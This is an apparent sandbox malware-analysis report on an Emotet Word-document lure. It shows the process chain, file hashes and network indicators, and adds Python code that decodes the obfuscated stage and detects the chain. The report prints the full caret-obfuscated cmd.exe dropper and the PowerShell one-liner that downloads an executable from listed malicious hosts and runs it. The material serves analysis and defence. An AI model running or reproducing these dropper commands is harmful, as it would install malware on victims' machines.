| Field | Value |
|---|---|
| File name | Untitled-NGC-W88319.doc |
| Full analysis | https://app.any.run/tasks/73e58bea-b6f9-4f65-830b-34386feb7b99 |
| Verdict | Malicious activity |
| Threats | Emotet. Originally a banking trojan, Emotet evolved into a modular loader and spam botnet that delivers other malware families. It targets mostly corporate victims, but private users are also infected through mass spam email campaigns carrying weaponized Office attachments such as this document. |
| Analysis date | November 14, 2018, 07:33:15 |
| OS | Windows 7 Professional Service Pack 1 (build 7601, 32-bit) |
| Tags | |
| Indicators | |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, OS: Windows, Version 6.1, Code page: 1252, Author: Gavin, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Nov 14 05:31:00 2018, Last Saved Time/Date: Wed Nov 14 05:31:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
| MD5 | CD1D6DE81B418AD59016BAB856B2ACAE |
| SHA1 | 2CD4915B0D081373CE0968589AEAD6234343F8E7 |
| SHA256 | 75C5359E2478B45A7526CF7ECEFBEA5C15D3C3BCDDBA32A40EF07D0CC0AC368D |
| SSDEEP | 1536:qjkqGO5ocn1kp59gxBK85fBt+a9Sy4z4He519y9ZjFz4AZUEZ:P41k/W48uz4He519y9ZjFz4AZUc |
| Extension | File type | Match (%) |
|---|---|---|
| .doc | Microsoft Word document | 54.2 |
| .doc | Microsoft Word document (old ver.) | 32.2 |
| Property | Value |
|---|---|
| CompObjUserType | Microsoft Word 97-2003 Document |
| CompObjUserTypeLen | 32 |
| HeadingPairs | - |
| TitleOfParts | - |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 16 |
| CharCountWithSpaces | 14 |
| Paragraphs | 1 |
| Lines | 1 |
| Company | - |
| CodePage | Windows Latin 1 (Western European) |
| Security | None |
| Characters | 13 |
| Words | 2 |
| Pages | 1 |
| ModifyDate | 2018:11:14 05:31:00 |
| CreateDate | 2018:11:14 05:31:00 |
| TotalEditTime | - |
| Software | Microsoft Office Word |
| RevisionNumber | 1 |
| LastModifiedBy | - |
| Template | Normal.dotm |
| Comments | - |
| Keywords | - |
| Author | Gavin |
| Subject | - |
| Title | - |

AppVersion 16 means the document was last saved by Word 2016 (16.x), whereas the sandbox opened it with Word 2010 (14.0.6024.1000, see the process list below). Identical create and modify timestamps, revision number 1, no recorded edit time and a two-word body are consistent with a freshly generated lure rather than a real working document, and the document was saved about two hours before it was submitted for analysis.
| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 3136 | `"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Untitled-NGC-W88319.doc"` | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 3636 | `cmd /V^:ON/C"^s^e^t c^E=^X0^u/[^Z^5nR^fd^H^9^k.'NC^i^MPv^G^}^x(^b^ ^-\+^$p^B^6)^e^T^@Jl^mwSA^]^j;q,ctoV^2L^1^{g^Or^I^h^8^E^=z^Wsa:^y&&^for %^a ^in (^3^2^,52,^42,36,^60^,68,6^2^,^36,^4^0^,^4^0^,2^7,^3^1^,48,^1^8^,7,^6^5^,^15,39^,1^1^,6^2,^15^,^4^7^,31^,^18^,^8^,^0^,6^5^,1^5,62,51^,^5^1,3^2,^7^0,3^,^3^,6^8^,51,2,^10,^5^6,^1,1,^14,26^,^18,66^,3,7,^37^,^0,6^8,^2^2,^3^6^,^6^3^,^5^3,^1^1,^3^8^,^6^2,^5^1,5^1^,^3^2,^7^0,3,^3,^52^,7^,40^,18,^7,36,^36,^60,36^,^58,18^,^6^8,^51,60,^6^9^,^5^1,^18^,^5^2^,7,14^,5^0,^52^,4^1,3,6^4^,^2^2^,46^,58,^5^5^,^5^1^,^2^1^,38^,6^2,^5^1^,51,32^,7^0,^3,3,^4^1,6^9,^60,^5^0,5^2,^5^0^,6^9^,^68,6^9,^7,52,^1^4^,1^8,51^,^3,51,0^,^1^8^,5^2^,^34^,^13,4^3,4^6^,^38,6^2,5^1,5^1,^32,^70,^3^,3,51,^6^0,^6^9,7,68^,^4^0^,^69,4^1,^3^2,^2,7^,^58^,1^4^,^50^,5^2^,^41^,3^,36^,5^4,4^0,^39,^8,^48,0^,5^9^,19,38,^6^2^,51^,5^1,^3^2^,^70^,^3^,^3,^4^1,2,1^0,6^9^,^7,66,^6^9,^6^8,7^1^,^68^,3^6,^6^0,^21,^1^8^,5^0,18^,^52^,6^8^,69,7^1,^69,40,^69^,^14^,50^,52,4^1,^3,^12^,^2^1^,44^,^3^2^,^37,^1^3,^10,1^8,50^,6,^1^5^,14^,^4^3^,^32^,40,18,^5^1^,^2^5,^1^5^,^38,1^5^,3^5,47^,31^,^48,^67^,^60,6^5,^25^,4^,^43,71,^68^,^5^1,3^6^,^41^,^14^,6^1^,^5^9,1^4^,^20^,^69^,^5^1^,^62,^4^5,^70^,70^,^22,^36^,^51,3^7^,36^,^41,^3^2,20^,^6^9^,^5^1^,6^2^,2^5,^3^5^,3^0^,^1^5^,2^9,^39^,5^,7,^1^4^,^3^6^,2^4,36,^1^5^,3^5,4^7,^31,^5^0,50^,8^,2^7,6^5^,1^6^,3^6^,42^,2^8^,^5^9,2^6,46,^36,^5^0^,^51^,^27^,2^8,5^0,5^2^,^4^1^,^27,^1^5^,^4^1,68,2^4,^4^1^,40,^54,14^,24,41^,^40,^6^2,51,51,^32,^1^5^,4^7,3^1,32,^1^7^,^37^,2^7,65^,^27,^1^6^,36^,^4^2^,^28,5^9,^26^,46,^36^,5^0,^51,^27^,^28,^50,^52,41,2^7,^15^,^6^9,^1^0^,^52^,1^0,26^,^1^4,68,51,^60^,^3^6,6^9^,^4^1,15^,^47^,^9^,^5^2,^6^0^,^36^,^69^,50^,^6^2^,25^,3^1^,^26,3^2,67^,2^7,^1^8,^7,2^7,31^,^18^,8^,^0^,3^5^,57^,^5^1^,^60,71^,^57^,31,^5^0^,^50^,8,1^4^,^5^2^,3^2,3^6,7,^2^5,^15^,^2^2,64,3^7,1^5,49,^3^1,26^,^32,^67^,^49^,1^,35^,^4^7^,^31,50^,50^,8,^14,68,36^,7,1^0,2^5^,^35,47,3^1^,32,^1^7^,^37^,^1^4,^52,3^2,^3^6,7,^25,^35,^47,31^,3^2^,17,3^7^,14^,^5^1,^71^,^3^2,^36,^27^,6^5,^27^,^56,47,^3^1^,^3^2,^1^7,^37,^1^4^,4^2^,60,^1^8,^51^,^36^,^25,3^1,^50,^5^0,8^,14,60^,36,^6^8,32,52^,7^,6^8^,^3^6^,3^3^,^52^,^10^,^71,35,4^7^,31^,^32^,1^7,^3^7^,14,6^8^,^6^9^,^2^1,^36^,51^,5^2,^9^,1^8,^4^0^,^36,^2^5,^31,48,67,^60^,3^5^,^4^7^,4^3^,51^,69^,^60^,5^1,^28,2^0^,60,52^,^5^0,36,68^,^6^8^,^27^,3^1^,^4^8,6^7^,6^0^,4^7^,26^,6^0^,36^,69^,13,^23,5^0,6^9,^5^1,^50^,^6^2,5^7^,^23,2^3,27^,^2^7^,^27,^2^7,^27,27^,2^7^,^2^7,27^,^27^,2^7^,^2^7^,^27,2^7^,^2^7^,^2^7^,^27,7^6)d^o ^s^e^t ^3w^p=!^3w^p!!c^E:~%^a,1!&&^if %^a ^g^e^q 7^6 c^a^l^l %^3w^p:~^-53^6%"` | C:\Windows\system32\cmd.exe | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 3316 | `powershell $qin='JHh';$iRX='http://stud100.biz/nTXsGe8VH@http://onlineeregistration.com/EGjgLtv@http://marcocasano.it/tXio6kSj@http://translampung.com/e2lJRqXOM@http://mudanzasyserviciosayala.com/9vApTkdic5'.Split('@');$qWr=([System.IO.Path]::GetTempPath()+'\JZn.exe');$ccR =New-Object -com 'msxml2.xmlhttp';$pCT = New-Object -com 'adodb.stream';foreach($bpW in $iRX){try{$ccR.open('GET',$bpW,0);$ccR.send();$pCT.open();$pCT.type = 1;$pCT.write($ccR.responseBody);$pCT.savetofile($qWr);Start-Process $qWr;break}catch{}}` | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 1620 | `"C:\Users\admin\AppData\Local\Temp\JZn.exe"` | C:\Users\admin\AppData\Local\Temp\JZn.exe | — | powershell.exe | User: admin; Company: Micro; Integrity Level: MEDIUM; Exit code: 0; Version: 6.1.7600.1 |
| 2488 | `"C:\Users\admin\AppData\Local\Temp\JZn.exe"` | C:\Users\admin\AppData\Local\Temp\JZn.exe | — | JZn.exe | User: admin; Company: Micro; Integrity Level: MEDIUM; Exit code: 0; Version: 6.1.7600.1 |
| 976 | `"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"` | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | JZn.exe | User: admin; Company: Micro; Integrity Level: MEDIUM; Exit code: 0; Version: 6.1.7600.1 |
| 2400 | `"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"` | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | — | lpiograd.exe | User: admin; Company: Micro; Integrity Level: MEDIUM; Version: 6.1.7600.1 |
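The cmd.exe command line of PID 3636 never contains the string "powershell". An alphabet is stored in the variable cE, and a FOR loop picks characters out of it by index with !cE:~%a,1! (which needs the delayed expansion that /V:ON switches on), appending each one to 3wp; when the loop reaches the final index 76 it CALLs the last 536 characters of 3wp, which is exactly the PowerShell one-liner recorded for PID 3316. The carets are cmd's escape character and disappear when the line is parsed, so they only defeat naive string matching. As an added example (mine, not part of the ANY.RUN report), the Python below reverses both layers and then pulls the fallback URL list and the drop filename out of the decoded PowerShell stage. It embeds the alphabet and the first 103 indices of the PID 3636 command line verbatim (the full index list runs to several thousand characters and is cut here, keeping the report's terminating 76), plus the PID 3316 command line as shown above; the function names are my own.

```python
"""Decode the cmd.exe "index-substring" obfuscation used by the Emotet dropper above.

Added example, not code from the ANY.RUN report. Two layers are in play:
  1. Caret escaping: '^' is cmd's escape character and is removed at parse
     time, so "^p^o^w" is just "pow" to cmd but breaks naive signatures.
  2. Index-substring building: an alphabet sits in one variable (cE), a FOR
     loop appends alphabet[index] via !cE:~%a,1! to a second variable (3wp),
     and 'call %3wp:~-536%' finally runs the last 536 characters of it.
"""
import re

# From PID 3636 in the report: alphabet and first 103 indices verbatim, the rest
# of the list cut, the final "76" sentinel (which fires the CALL) kept. The line
# breaks inside the index list are added here for readability only.
CMD_STAGE_TRUNCATED = r'''cmd /V^:ON/C"^s^e^t c^E=^X0^u/[^Z^5nR^fd^H^9^k.'NC^i^MPv^G^}^x(^b^ ^-\+^$p^B^6)^e^T^@Jl^mwSA^]^j;q,ctoV^2L^1^{g^Or^I^h^8^E^=z^Wsa:^y&&^for %^a ^in (^3^2^,52,^42,36,^60^,68,6^2^,^36,^4^0^,^4^0^,2^7,^3^1^,48,^1^8^,7,^6^5^,^15,39^,1^1^,6^2,^15^,^4^7^,31^,^18^,^8^,^0^,6^5^,1^5,62,51^,^5^1,3^2,^7^0,3^,^3^,
^6^8^,51,2,^10,^5^6,^1,1,^14,26^,^18,66^,3,7,^37^,^0,6^8,^2^2,^3^6^,^6^3^,^5^3,^1^1,^3^8^,^6^2,^5^1,5^1^,^3^2,^7^0,3,^3,^52^,7^,40^,18,^7,36,^36,^60,36^,^58,18^,^6^8,^51,60,^6^9^,^5^1,^18^,^5^2^,7,14^,5^0,^52^,4^1,
3,6^4^,^2^2^,46^,58,^5^5^,^5^1^,^2^1^,38^,6^2,^5^1^,51,32^,7^0,^3,3,7^6)d^o ^s^e^t ^3w^p=!^3w^p!!c^E:~%^a,1!&&^if %^a ^g^e^q 7^6 c^a^l^l %^3w^p:~^-53^6%"'''

# The second stage exactly as the report shows it for PID 3316 (split over
# source lines with implicit concatenation; it ran as a single line).
STAGE2_FROM_REPORT = (
    "powershell $qin='JHh';$iRX='http://stud100.biz/nTXsGe8VH@http://onlineeregistration.com/EGjgLtv@"
    "http://marcocasano.it/tXio6kSj@http://translampung.com/e2lJRqXOM@"
    "http://mudanzasyserviciosayala.com/9vApTkdic5'.Split('@');"
    "$qWr=([System.IO.Path]::GetTempPath()+'\\JZn.exe');$ccR =New-Object -com 'msxml2.xmlhttp';"
    "$pCT = New-Object -com 'adodb.stream';foreach($bpW in $iRX){try{$ccR.open('GET',$bpW,0);$ccR.send();"
    "$pCT.open();$pCT.type = 1;$pCT.write($ccR.responseBody);$pCT.savetofile($qWr);Start-Process $qWr;break}catch{}}"
)


def strip_carets(s: str) -> str:
    """Undo cmd.exe escaping: '^' makes the next character literal and is itself dropped."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "^" and i + 1 < len(s):
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def decode_index_substring(cmdline: str) -> str:
    """Rebuild the string that the FOR loop assembles and CALLs."""
    plain = strip_carets(cmdline)
    m = re.search(r"set\s+(\w+)=(.*?)&&\s*for\s+%(\w+)\s+in\s*\(([\d,\s]+)\)", plain)
    if not m:
        raise ValueError("not the expected set/for index-substring pattern")
    alphabet_var, alphabet, loop_var, index_list = m.groups()
    # The loop body must index the same variable that holds the alphabet.
    if not re.search(rf"!{alphabet_var}:~%{loop_var},1!", plain):
        raise ValueError("loop body does not index the alphabet variable")
    indices = [int(x) for x in re.findall(r"\d+", index_list)]
    # cmd's %var:~n,1% yields "" when n is past the end; that is what index 76 does here.
    built = "".join(alphabet[i] if i < len(alphabet) else "" for i in indices)
    # 'call %3wp:~-536%' runs only the last 536 characters (the whole string if shorter).
    tail = re.search(r"call\s+%\w+:~-(\d+)%", plain)
    if tail:
        built = built[-int(tail.group(1)):]
    return built.rstrip()


def extract_stage2_iocs(ps_cmdline: str) -> dict:
    """Pull the '@'-separated fallback URL list and the %TEMP% drop name from the PowerShell stage."""
    urls = re.search(r"'([^']*@[^']*)'\.Split\('@'\)", ps_cmdline)
    drop = re.search(r"GetTempPath\(\)\+'([^']+)'", ps_cmdline)
    return {
        "urls": urls.group(1).split("@") if urls else [],
        "drop_name": drop.group(1).lstrip("\\") if drop else None,
    }


if __name__ == "__main__":
    print(decode_index_substring(CMD_STAGE_TRUNCATED))
    for url in extract_stage2_iocs(STAGE2_FROM_REPORT)["urls"]:
        print(url)
```

Pasting the full PID 3636 command line in place of the truncated constant decodes the whole stage the same way, which is the quickest way to recover the URL list when a sandbox or EDR only captured the cmd.exe line and not its PowerShell child. The five URLs are tried in order and the loop breaks on the first successful download, so only the first reachable host (stud100.biz in this run) shows up in the network section.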
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3136 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2DD1.tmp.cvr | — | — | — |
| 3316 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\POV7N2GUO57ZVRFKIIA1.temp | — | — | — |
| 3316 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 2E6C332796340AFFBFF5230455889D0D | 6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E |
| 3136 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 9BE5DDDB2A1E7DBDC5967DE15F0CCE53 | B91AC8E126B954B0D8A8D101EF890DEEA64F635C0A14EF731869A6313C124F70 |
| 2488 | JZn.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | D984329D7732DA39DE1085AC9CDCB428 | 10339B0CC22729340F8E538735D29B8839FE325BB8D4F70A33026765DD7F71B2 |
| 3316 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF183a54.TMP | binary | 2E6C332796340AFFBFF5230455889D0D | 6F83140E19865C73D28025CDCE4DC60261AB057414157519A4A1AAA80DF8540E |
| 3316 | powershell.exe | C:\Users\admin\AppData\Local\Temp\JZn.exe | executable | D984329D7732DA39DE1085AC9CDCB428 | 10339B0CC22729340F8E538735D29B8839FE325BB8D4F70A33026765DD7F71B2 |
| 3136 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$titled-NGC-W88319.doc | pgc | AD0F60A5E58E4E5064EB7E1B4294AF4E | 09D091CC46FC7DE6E7C9F3537A26E386D4F1A064CB7A23485C6FB698044E4DF2 |

JZn.exe (written to %TEMP% by powershell.exe, PID 3316) and lpiograd.exe (written by JZn.exe, PID 2488) have the same MD5 and SHA256: the downloaded payload copies itself byte-for-byte into %LOCALAPPDATA%\Microsoft\Windows\ and then launches the copy, so a hash-based block of either file covers both.
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2400 | lpiograd.exe | GET | — | 187.163.174.149:8080 | http://187.163.174.149:8080/ | MX | — | — | malicious |
3316 | powershell.exe | GET | 200 | 45.252.248.22:80 | http://stud100.biz/nTXsGe8VH/ | VN | executable | 448 Kb | malicious |
3316 | powershell.exe | GET | 301 | 45.252.248.22:80 | http://stud100.biz/nTXsGe8VH | VN | html | 617 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2400 | lpiograd.exe | 187.163.174.149:8080 | — | Axtel, S.A.B. de C.V. | MX | malicious |
3316 | powershell.exe | 45.252.248.22:80 | stud100.biz | AZDIGI Corporation | VN | suspicious |
Domain | IP | Reputation
---|---|---
stud100.biz | 45.252.248.22 | malicious
PID | Process | Class | Message |
---|---|---|---|
3316 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3316 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
3316 | powershell.exe | A Network Trojan was detected | ET TROJAN VBScript Redirect Style Exe File Download |
3316 | powershell.exe | Misc activity | ET INFO Possible EXE Download From Suspicious TLD |
3316 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
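The process list and the network sections above describe a single chain: explorer.exe starts WINWORD.EXE, which spawns a caret-escaped cmd.exe index-substring builder, which spawns powershell.exe; PowerShell downloads through the msxml2.xmlhttp and adodb.stream COM objects, saves the body as %TEMP%\JZn.exe and runs it with Start-Process; JZn.exe writes a byte-identical copy to %LOCALAPPDATA%\Microsoft\Windows\lpiograd.exe, and that copy beacons to 187.163.174.149:8080. The Suricata signatures only fire on the download; on the host it is the shape of the process tree that gives the chain away. As an added example (mine, not ANY.RUN's), the Python below runs that detection logic over constructed Sysmon Event ID 1-style records (Image, ParentImage, CommandLine) that mirror the report's tree, plus one benign cmd.exe control. The PIDs and paths follow the report; the hostnames in the PowerShell sample, the shortened cmd line and the rule names are invented.

```python
"""Host-side heuristics for the WINWORD -> cmd -> powershell -> %TEMP% exe chain.

Added example over constructed Sysmon Event ID 1-style records; not taken
from the sandbox's own telemetry. Each rule alone is weak; the value is in
several of them firing along one parent-child path.
"""
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


@dataclass
class ProcessEvent:
    pid: int
    image: str          # full path of the created process
    parent_image: str   # full path of its parent
    command_line: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def caret_ratio(command_line: str) -> float:
    """Share of '^' characters; legitimate command lines rarely exceed a few percent."""
    return command_line.count("^") / max(len(command_line), 1)


def cmd_findings(command_line: str) -> list:
    """Caret escaping plus the /V:ON and !var:~%x,1! substring-builder idiom."""
    plain = command_line.replace("^", "")  # crude de-escape, enough for matching
    found = []
    if caret_ratio(command_line) > 0.05:
        found.append("caret_escape_density")
    if re.search(r"/V:ON", plain, re.I) and re.search(r"!\w+:~%\w+,1!", plain):
        found.append("cmd_index_substring_builder")
    return found


def powershell_findings(command_line: str) -> list:
    """COM-object download-and-execute with an '@'-joined fallback URL list."""
    low = command_line.lower()
    found = []
    if "msxml2.xmlhttp" in low and "adodb.stream" in low:
        found.append("ps_com_http_download")
    if "savetofile" in low and "start-process" in low:
        found.append("ps_save_and_execute")
    if ".split('@')" in low and low.count("http") >= 2:
        found.append("ps_multi_url_fallback")
    return found


def classify(ev: ProcessEvent) -> list:
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    found = []
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        found.append("office_spawned_script_host")
    if image == "cmd.exe":
        found += cmd_findings(ev.command_line)
    if image == "powershell.exe":
        found += powershell_findings(ev.command_line)
    if parent in SCRIPT_HOSTS and re.search(r"\\AppData\\Local\\Temp\\[^\\]+\.exe$", ev.image, re.I):
        found.append("script_host_launched_temp_exe")
    if (re.search(r"\\AppData\\Local\\Microsoft\\Windows\\[^\\]+\.exe$", ev.image, re.I)
            and re.search(r"\\Temp\\", ev.parent_image, re.I)):
        found.append("temp_exe_spawned_copy_in_appdata")
    return found


def triage(events) -> dict:
    """Map PID -> findings for every event that tripped at least one heuristic."""
    result = {}
    for ev in events:
        found = classify(ev)
        if found:
            result[ev.pid] = found
    return result


# Constructed events mirroring the report's tree. Hostnames in the PowerShell
# line are placeholders and the cmd line is a shortened stand-in for PID 3636.
SAMPLE_EVENTS = [
    ProcessEvent(3136, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE", r"C:\Windows\explorer.exe",
                 r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n Untitled-NGC-W88319.doc'),
    ProcessEvent(3636, r"C:\Windows\system32\cmd.exe", r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
                 r'cmd /V^:ON/C"^s^e^t c^E=^X0^u/[^Z^5n&&^for %^a ^in (^3^2^,52) d^o ^s^e^t ^3w^p=!^3w^p!!c^E:~%^a,1!&&c^a^l^l %^3w^p%"'),
    ProcessEvent(3316, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\system32\cmd.exe",
                 "powershell $iRX='http://a.invalid/x@http://b.invalid/y'.Split('@');$c=New-Object -com 'msxml2.xmlhttp';"
                 "$s=New-Object -com 'adodb.stream';$s.savetofile($q);Start-Process $q"),
    ProcessEvent(1620, r"C:\Users\admin\AppData\Local\Temp\JZn.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r'"C:\Users\admin\AppData\Local\Temp\JZn.exe"'),
    ProcessEvent(976, r"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe",
                 r"C:\Users\admin\AppData\Local\Temp\JZn.exe", r'"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"'),
    # Benign control: an ordinary cmd one-liner from explorer.exe must stay silent.
    ProcessEvent(4242, r"C:\Windows\system32\cmd.exe", r"C:\Windows\explorer.exe", r'cmd /C "dir C:\Users\admin\Documents"'),
]

if __name__ == "__main__":
    for pid, found in triage(SAMPLE_EVENTS).items():
        print(pid, found)
```

The caret-density check is the cheapest signal and also the easiest to evade (the builder works without carets), so it is paired with the /V:ON plus substring-loop pattern; the parent-child rules need no content inspection at all and survive any change to the encoding. The final C2 check-in to 187.163.174.149:8080 is not modelled here because it belongs to network telemetry, where a bare IP on a non-standard port with no Host header is its own flag.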